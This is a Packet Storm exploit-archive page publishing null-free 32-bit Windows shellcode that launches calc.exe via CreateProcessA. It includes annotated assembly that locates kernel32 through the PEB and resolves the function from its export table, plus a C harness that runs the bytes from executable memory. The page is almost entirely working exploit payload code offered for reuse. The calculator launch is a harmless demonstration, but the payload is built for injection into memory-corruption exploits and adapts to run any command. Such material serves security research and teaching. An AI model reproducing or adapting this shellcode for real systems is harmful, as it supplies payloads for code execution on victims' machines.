Twenty Year Anniversary

All Windows Null-Free CreateProcessA Calc Shellcode

All Windows Null-Free CreateProcessA Calc Shellcode
Posted Jul 6, 2011
Authored by AutoSec Tools | Site autosectools.com

112 bytes small all Windows null-free CreateProcessA calc.exe shellcode.

tags | shellcode
systems | windows
MD5 | ba9a69346aa022a746db247c8f3836f5

All Windows Null-Free CreateProcessA Calc Shellcode

Change Mirror Download
/*

;------------------------------------------------------------------------
;Title...................All Windows Null-free CreateProcessA Calc
;........................Shellcode 112 Bytes
;Release Date............7/5/2011
;Tested On...............Windows 2000, Windows XP, Windows XP x64,
;........................Windows Vista, Windows 7, Windows 8 M3 x64
;------------------------------------------------------------------------
;Author..................John Leitch
;Site....................http://www.autosectools.com/
;Email...................john@autosectools.com
;------------------------------------------------------------------------

bits 32

xor ebx, ebx

;================================
;Find Kernel32 Base
;================================
mov edi, [fs:ebx+0x30]
mov edi, [edi+0x0c]
mov edi, [edi+0x1c]

module_loop:
mov eax, [edi+0x08]
mov esi, [edi+0x20]
mov edi, [edi]
cmp byte [esi+12], '3'
jne module_loop

;================================
;Kernel32 PE Header
;================================
mov edi, eax
add edi, [eax+0x3c]

;================================
; Export directory table
;================================
;0x00 Export Flags
;0x04 Time/Date Stamp
;0x08 Major Version
;0x0A Minor Version
;0x0C Name RVA
;0x10 Ordinal Base
;0x14 Address Table Entries
;0x18 Number Of Names
;0x1c Address Table RVA
;0x20 Name Pointer Table RVA
;0x24 Ordinal Table RVA
;================================

;================================
;Kernel32 Export Directory Table
;================================
mov edx, [edi+0x78]
add edx, eax

;================================
;Kernel32 Name Pointers
;================================
mov edi, [edx+0x20]
add edi, eax

;================================
;Find CreateProcessA
;================================
mov ebp, ebx
name_loop:
mov esi, [edi+ebp*4]
add esi, eax
inc ebp
cmp dword [esi], 0x61657243 ;Crea
jne name_loop
cmp dword [esi+8], 0x7365636f ;oces
jne name_loop

;================================
;CreateProcessA Ordinal
;================================
mov edi, [edx+0x24]
add edi, eax
mov bp, [edi+ebp*2]

;================================
;CreateProcessA Address
;================================
mov edi, [edx+0x1C]
add edi, eax
mov edi, [edi+(ebp-1)*4] ;subtract ordinal base
add edi, eax

;================================
;Zero Memory
;================================
mov ecx, ebx
mov cl, 0xFF
zero_loop:
push ebx
loop zero_loop

push 0x636c6163 ;calc
mov edx, esp

;================================
;Call CreateProcessA
;================================
push edx ;__out LPPROCESS_INFORMATION lpProcessInformation
push edx ;__in LPSTARTUPINFO lpStartupInfo,
push ebx ;__in_opt LPCTSTR lpCurrentDirectory,
push ebx ;__in_opt LPVOID lpEnvironment,
push ebx ;__in DWORD dwCreationFlags,
push ebx ;__in BOOL bInheritHandles,
push ebx ;__in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes,
push ebx ;__in_opt LPSECURITY_ATTRIBUTES lpProcessAttributes,
push edx ;__inout_opt LPTSTR lpCommandLine,
push ebx ;__in_opt LPCTSTR lpApplicationName,
call edi

*/

#include <stdio.h>
#include <windows.h>

using namespace std;

int main()
{

char* shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

printf("shellcode length: %i", strlen(shellcode));

LPVOID lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(lpAlloc, shellcode, strlen(shellcode));

((void(*)())lpAlloc)();

return 0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    4 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close